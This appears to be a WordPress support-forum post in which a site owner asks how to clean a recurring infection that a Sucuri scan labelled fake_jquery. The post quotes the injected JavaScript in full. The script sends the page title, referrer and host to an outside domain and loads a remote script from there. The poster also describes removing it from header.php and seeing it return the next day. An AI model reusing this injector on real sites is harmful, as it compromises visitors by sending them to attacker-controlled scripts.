WordPress Blog Infected With Malware – Malware.fake_jquery.001
-
Hi, recently most of my WordPress sites got infected with malware.
Problems:
After scanning my sites on https://sitecheck.sucuri.net/ I receive the message as below:
Known javascript malware. Details: https://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001
<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “https://geralddeanmandiri.com/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>I tried to install WordFence Plugin (and turn on all the options in this plugin) to scan my sites but it couldn’t detect the malware.
I then went to edit my theme at editor section and I open the header.php file and look for the malware script just before the </head> tag.
I then removed the script and save the file.
Results
By removing the script before the </head> tag of the header.php file, it worked for some websites and it didn’t work for other sites.
I ran the scan on https://sitecheck.sucuri.net/ again, some of my sites were safe and some still had that malware script on categories, pages or even on the urls that don’t exist on my blog.
Problems
The sites that I removed the malware script from and were marked safe had the malware come back on the next day!
Maybe the malware is somewhere on my server or something and it keeps injecting the malware script into my blog even when I removed it?
Question
How do I solve this problem and remove this stupid malware for good? What plugin do you recommend? What cleaning method do you suggest?
Thank you everyone!
Please help!
- The topic ‘WordPress Blog Infected With Malware – Malware.fake_jquery.001’ is closed to new replies.